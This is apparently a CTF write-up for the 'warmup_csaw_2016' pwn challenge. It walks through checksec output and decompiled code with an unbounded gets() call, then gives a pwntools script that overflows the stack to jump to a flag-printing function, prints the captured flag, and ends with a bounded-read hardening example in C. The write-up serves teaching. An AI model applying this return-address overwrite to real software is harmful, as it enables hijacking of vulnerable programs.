BUUCTF PWN Pitfalls 03: warmup_csaw_2016
阿新 • Published: 2021-01-19
warmup_csaw_2016
- 1.file
root@kali:~/Downloads# file warmup_csaw_2016
warmup_csaw_2016: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=7b7d75c51503566eb1203781298d9f0355a66bd3, stripped
A 64-bit program.
- 2.checksec
root@kali:~/Downloads# checksec warmup_csaw_2016
[*] '/root/Downloads/warmup_csaw_2016'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE
No protections.
- 3.IDA
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  char s; // [rsp+0h] [rbp-80h]
  char v5; // [rsp+40h] [rbp-40h]

  write(1, "-Warm Up-\n", 0xAuLL);
  write(1, "WOW:", 4uLL);
  sprintf(&s, "%p\n", sub_40060D);
  write(1, &s, 9uLL);
  write(1, ">", 1uLL);
  return gets(&v5, ">");
}
Execution result
root@kali:~/Downloads# ./warmup_csaw_2016
-Warm Up-
WOW:0x40060d
>12
Looking at sub_40060D
int sub_40060D()
{
return system("cat flag.txt");
}
This function can be used. v5 sits at rbp-0x40 and gets() has no length check, so 0x40 bytes fill v5, the next 8 overwrite the saved rbp, and the following 8 replace the return address with the address of sub_40060D, 0x40060d.
Constructing the exploit:
#!/usr/bin/python3
# coding=utf-8
from pwn import *

port = 25397
p = remote('node3.buuoj.cn', port)
# 0x40 bytes fill v5, 8 bytes cover the saved rbp, then the return address
payload = b'a'*0x40 + b'b'*8 + p64(0x40060d)
p.sendline(payload)
p.interactive()
Exploit execution result
root@kali:~/Downloads# python3 exp_warmup_csaw_2016.py
[+] Opening connection to node3.buuoj.cn on port 25397: Done
[*] Switching to interactive mode
-Warm Up-
WOW:0x40060d
>flag{7fe33307-500a-42af-a7a6-b9a039f20b8f}
timeout: the monitored command dumped core
[*] Got EOF while reading in interactive
$
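The defect the payload relies on is the unbounded gets() into the 64-byte v5 slot. As an added example (not code from the write-up or the challenge binary), the C below models main()'s frame as shown in the decompilation and reads the line with an fgets-based bounded reader instead; struct frame, bounded_read_line, frame_intact_after_read and demo_a_line are assumed names, and the lines fed in are constructed.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* Model of main()'s frame as decompiled: v5 at rbp-0x40 (64 bytes), then
   the saved rbp, then the return address. Constructed for illustration. */
struct frame {
    char v5[0x40];
    uint64_t saved_rbp;
    uint64_t ret_addr;
};

/* Hardened stand-in for gets(): stores at most cap-1 bytes, always
   NUL-terminates, and drains the rest of an over-long line so nothing can
   spill past dst. Returns bytes stored, or -1 if input had to be truncated. */
int bounded_read_line(char *dst, size_t cap, FILE *in) {
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL) return -1;
    size_t n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') { dst[--n] = '\0'; return (int)n; }
    int c, dropped = 0;            /* no newline: drain to end of line */
    while ((c = fgetc(in)) != EOF && c != '\n') dropped = 1;
    return dropped ? -1 : (int)n;
}

/* Feed `line` into the modelled frame through the bounded reader. Returns
   0 if saved_rbp/ret_addr were clobbered, 1 if the line fit, 2 if it was
   truncated but the frame stayed intact, -1 on setup failure. */
int frame_intact_after_read(const char *line, size_t len) {
    struct frame f = { {0}, 0x1111111111111111ULL, 0x2222222222222222ULL };
    FILE *in = fmemopen((void *)line, len, "r");
    if (in == NULL) return -1;
    int stored = bounded_read_line(f.v5, sizeof f.v5, in);
    fclose(in);
    if (f.saved_rbp != 0x1111111111111111ULL || f.ret_addr != 0x2222222222222222ULL)
        return 0;
    return stored < 0 ? 2 : 1;
}

/* Constructed line of n 'A's plus the '\n' that sendline() appends; n = 72
   is the length of the write-up's 0x40 + 8 + 8 payload. */
int demo_a_line(size_t n) {
    char line[128];
    if (n >= sizeof line) return -1;
    memset(line, 'A', n);
    line[n] = '\n';
    return frame_intact_after_read(line, n + 1);
}
```

A 63-byte line still fits (result 1); 64 bytes or the 72-byte payload length are cut at 63 bytes and reported as truncated (result 2) while saved rbp and the return address stay untouched.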
The above is my own approach to this problem; everyone is welcome to discuss and learn together.